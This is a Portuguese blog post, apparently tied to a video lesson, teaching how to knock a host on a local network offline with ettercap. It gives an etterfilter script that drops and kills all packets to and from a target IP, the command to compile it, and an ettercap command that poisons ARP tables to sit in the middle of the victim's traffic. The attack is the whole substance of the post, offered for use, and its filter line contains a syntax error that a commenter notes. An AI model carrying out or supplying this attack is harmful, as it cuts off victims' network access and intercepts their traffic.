• homepost1

  • homepost4

  • homepost2

  • homepost5

  • homepost3

  • homepost6

  • homepost7

Denial Of Service (DOS) com ettercap

Um ataque de negação de serviço (também conhecido como DoS - Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores.

Na vídeo aula e passada dentro de um ambiente de rede interna, no meu caso eu ja sabia qual o endereço de ip da maquina a qual eu quero usar o ataque, mas você podem usar ferramentas de rede para identificar maquinas que estão ligadas no momento para um possível ataque, ex: de uma ferramenta muito utilizado e o nmap, lembrando que existe inúmeras ferramentas para esse fim.


Primeiro passo -> Criar uma arquivo com a extensão .eft, no caso especifico eu coloquei o nome de dos.eft que poderia ser qualquer nome.

if (ip.src == 'IP do alvo' || ip.dst 'IP do alvo') {
drop();
kill();
msg("Mensagem que sera imprimida na tela\n");
}

Segundo passo -> Temos que compilar o arquivo com o filtro do ettercap, para que o mesmo possa executar o arquivo. Então abram o terminal e digite a seguinte sintaxe de comando:
OBS: Olhe para o local onde foi salvo o arquivo, no meu caso foi na pasta "root", minha area de trabalho.

# etterfilter dos.eft -o dos.ef

Terceiro passo -> Vamos da inicio ao ataque, usando o ettercap:

# ettercap -T -q -F /local.do.arquivo/dos.ef -M arp /IP do alvo/ // -i etho

Obs: eth0 - e minha interface de rede.


Volia, se o host alvo tentar acessar a internet, estava impedido de executar tal função.... rsrs


O que acontece?

Faço o MITM com ettercap e uso o filtro que eu criei o dos.ef, quando o host alvo faz uma solicitação, o ettercap simplesmente descarta os pacotes e não deixa os mesmo chegarem ao destino... com isso temos uma negação de serviço.

Baixar:
http://www.4shared.com/file/knAfoYZE/Denial_Of_Service_ettercap_.html

Assisti on-line:




Filed Under:

About the Author

My name is Dinh Quang Huy or known as alias NhamNgaHanh .I made this template in magazine style and named it Simplex Darkness .I hope it helpful to persons who want a solutions for a template in Blogspot.To download this template and see template install instruction ,go to Simplex Design blog.

1 comment

Trackback URL | Comments RSS Feed

  1. Bhior says:

    @Anônimo,

    Você errou na sintaxe da linha 1.
    Por isso o código não pode ser compilado

    []'

     

Leave a Reply